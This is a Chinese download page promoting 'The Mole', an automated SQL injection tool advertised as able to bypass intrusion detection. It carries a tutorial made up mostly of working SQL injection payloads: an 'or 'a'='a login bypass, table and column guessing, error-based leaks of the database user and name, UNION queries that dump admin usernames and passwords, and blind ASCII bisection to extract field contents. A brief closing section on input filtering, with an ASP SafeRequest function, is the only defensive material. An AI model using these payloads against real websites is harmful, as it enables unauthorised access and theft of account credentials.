the mole注入工具下載 最新更新|軟件分類|軟件專題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置: 首頁安全相關(guān)系統(tǒng)安全 → the mole工具(自動化SQL注入工具) v0.3 英文命令行工具_(dá)附教程

the mole工具(自動化SQL注入工具)

v0.3 英文命令行工具_(dá)附教程

the mole工具(自動化SQL注入工具)下載
  • 軟件大?。?span itemprop="fileSize">4.94 MB
  • 軟件語言:中文
  • 軟件類型:國產(chǎn)軟件 / 系統(tǒng)安全
  • 軟件授權(quán): 免費(fèi)軟件
  • 更新時間:2017-06-02 16:33:34
  • 軟件等級:4星
  • 軟件廠商: -
  • 應(yīng)用平臺:WinAll, WinXP, Win7
  • 軟件官網(wǎng):

ITMOP本地下載文件大?。?.94 MB

點(diǎn)贊 好評 0%(0) 差評 差評 0%(0)

軟件介紹人氣軟件精品推薦相關(guān)文章網(wǎng)友評論下載地址

小編為您推薦: themole sql注入工具

the mole注入工具是有sql注入需要的用戶們不可錯過的強(qiáng)大工具,有了該軟件,用戶們就會發(fā)現(xiàn)注入sql會變得簡單許多,具體的軟件介紹如下,有需要的朋友們歡迎前來下載!

the mole官方介紹:

The Mole是一款開源的自動化SQL注入工具,其可繞過IPS/IDS(入侵防御系統(tǒng)/入侵檢測系統(tǒng)).只需提供一個URL和一個可用的關(guān)鍵字,它就能夠檢測注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢的注入技術(shù).The Mole攻擊范圍包括SQL ServerMySQL、Postgres和Oracle數(shù)據(jù)庫

the mole注入工具

sql的注入方法:

方法1

后臺身份驗(yàn)證繞過漏洞

驗(yàn)證繞過漏洞就是'or'='or'后臺繞過漏洞,利用的就是AND和OR的運(yùn)算規(guī)則,從而造成后臺腳本邏輯性錯誤

例如管理員的賬號密碼都是admin,那么再比如后臺的數(shù)據(jù)庫查詢語句是

user=request("user")

passwd=request("passwd")

sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''

那么我使用'or 'a'='a來做用戶名密碼的話,那么查詢就變成了

select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'

這樣的話,根據(jù)運(yùn)算規(guī)則,這里一共有4個查詢語句,那么查詢結(jié)果就是 假or真and假or真,先算and 再算or,最終結(jié)果為真,這樣就可以進(jìn)到后臺了

這種漏洞存在必須要有2個條件,第一個:在后臺驗(yàn)證代碼上,賬號密碼的查詢是要同一條查詢語句,也就是類似

sql="select * from admin where username='"&username&'&"passwd='"&passwd&'

如果一旦賬號密碼是分開查詢的,先查帳號,再查密碼,這樣的話就沒有辦法了.

第二就是要看密碼加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一種條件有沒有可以,沒有達(dá)到第一種條件的話,那就沒有戲了

方法2

先猜表名

And (Select count(*) from 表名)<>0

猜列名

And (Select count(列名) from 表名)<>0

或者也可以這樣

and exists (select * from 表名)

and exists (select 列名 from 表名)

返回正確的,那么寫的表名或列名就是正確

這里要注意的是,exists這個不能應(yīng)用于猜內(nèi)容上,例如and exists (select len(user) from admin)>3 這樣是不行的

很多人都是喜歡查詢里面的內(nèi)容,一旦iis沒有關(guān)閉錯誤提示的,那么就可以利用報錯方法輕松獲得庫里面的內(nèi)容

獲得數(shù)據(jù)庫連接用戶名:;and user>0

這個是小竹提出來的,我這里引用《SQL注入天書》里面的一段話來講解:

"重點(diǎn)在and user>0,我們知道,user是SQLServer的一個內(nèi)置變量,它的值是當(dāng)前連接的用戶名,類型為nvarchar.拿一個 nvarchar的值跟int的數(shù)0比較,系統(tǒng)會先試圖將nvarchar的值轉(zhuǎn)成int型,當(dāng)然,轉(zhuǎn)的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar轉(zhuǎn)換int異常,XXXX不能轉(zhuǎn)換成int"

看到這里大家明白了吧,報錯的原理就是利用SQLserver內(nèi)置的系統(tǒng)表進(jìn)行轉(zhuǎn)換查詢,轉(zhuǎn)換過程會出錯,然后就會顯示出在網(wǎng)頁上,另外還有類似的and 1=(selet top 1 user from admin),這種語句也是可以爆出來的.;and db_name()>0 則是暴數(shù)據(jù)庫名.

一旦關(guān)閉了IIS報錯,那么還可以用union(聯(lián)合查詢)來查內(nèi)容,主要語句就是

Order by 10

And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin

And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

上面的order by 10主要就是查字段數(shù)目,admin就是表名,可以自己猜,user,passwd是列名

反正就是返回正確即對,返回異常即錯

另外還有十分常用的ASCII碼拆半法

先要知道指定列名,例如user里的內(nèi)容的長度

and (select len(user) from admin)=2 就是查詢長度為不為2位,返回錯誤的增加或減少數(shù)字,一般這個數(shù)字不會太大,太大的就要放棄了,猜也多余

后面的邏輯符號可以根據(jù)不同要求更改的,

>;大于 <;小于 =就是等于咯,更新語句的話,=也可以表示傳遞符號 <>;就是不等

知道了長度后就可以開始猜解了

And (Select top 1 asc(mid(user,n,1)) from admin)>100

n就是猜解的表名的第幾位,最后的長度數(shù)字就是剛才猜解出來的列名長度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里內(nèi)容的第一位的ASCII字符是不是大于100

正確的話,那么表示USER第一個字符的ASCII碼大于100,那么就猜>120,返回錯誤就是介于100-120之間,然后再一步一步的縮少,最終得到正確字符XXX,然后用ASCII轉(zhuǎn)換器吧這個轉(zhuǎn)換成普通字符就可以了

然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去

加在url后面,列名表名還是先猜解,返回正確的代表帳號的ASCII碼大于100,那么就再向前猜,直到報錯,把猜出來的ASCII碼拿去ASCII轉(zhuǎn)換器轉(zhuǎn)換就可以了,中文是負(fù)數(shù),加上asb取絕對值

And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320

得到之后就記得在數(shù)字前加-號,不然ASCII轉(zhuǎn)換器轉(zhuǎn)換不來的,中文在ASCII碼里是-23423這樣的,所以猜起來挺麻煩

這個猜解速度比較慢,但是效果最好,最具有廣泛性

方法3

防御方法

對于怎么防御SQL注入呢,這個網(wǎng)上很多,我這里講幾個

如果自己編寫防注代碼,一般是先定義一個函數(shù),再在里面寫入要過濾的關(guān)鍵詞,如select ; "";from;等,這些關(guān)鍵詞都是查詢語句最常用的詞語,一旦過濾了,那么用戶自己構(gòu)造提交的數(shù)據(jù)就不會完整地參與數(shù)據(jù)庫的操作.

當(dāng)然如果你的網(wǎng)站提交的數(shù)據(jù)全部都是數(shù)字的,可以使用小竹提供的方法

Function SafeRequest(ParaName,ParaType)

'--- 傳入?yún)?shù) ---

'ParaName:參數(shù)名稱-字符型

'ParaType:參數(shù)類型-數(shù)字型(1表示以上參數(shù)是數(shù)字,0表示以上參數(shù)為字符)

Dim ParaValue

ParaValue=Request(ParaName)

If ParaType=1 then

If not isNumeric(ParaValue) then

Response.write "參數(shù)" & ParaName & "必須為數(shù)字型!"

Response.end

End if

Else

ParaValue=replace(ParaValue,"'","''")

End if

SafeRequest=ParaValue

End function

然后就用SafeRequest()來過濾參數(shù) ,檢查參數(shù)是否為數(shù)字,不是數(shù)字的就不能通過.

the mole工具測評:

The Mole是一款自動化的SQL注入漏洞利用工具.只需提供一個URL和一個可用的關(guān)鍵字,它就能夠檢測注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢的注入技術(shù).

更多>> 軟件截圖

推薦應(yīng)用

其他版本下載

    精品推薦 sql注入工具

    sql注入工具
    更多 (9個) >> sql注入工具 SQL注入工具是一系列可以幫助用戶們進(jìn)行SQL注入的軟件工具,SQL注入是指通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,致使非法數(shù)據(jù)侵入系統(tǒng).由于SQL注入利用的是正常的HTTP服務(wù)端口,表面上看來和正常的web訪

    相關(guān)文章

    下載地址

    • the mole工具(自動化SQL注入工具) v0.3 英文命令行工具_(dá)附教程

    查看所有評論>> 網(wǎng)友評論

    發(fā)表評論

    (您的評論需要經(jīng)過審核才能顯示) 網(wǎng)友粉絲QQ群號:374962675

    查看所有 0條 評論>>

    更多>> 猜你喜歡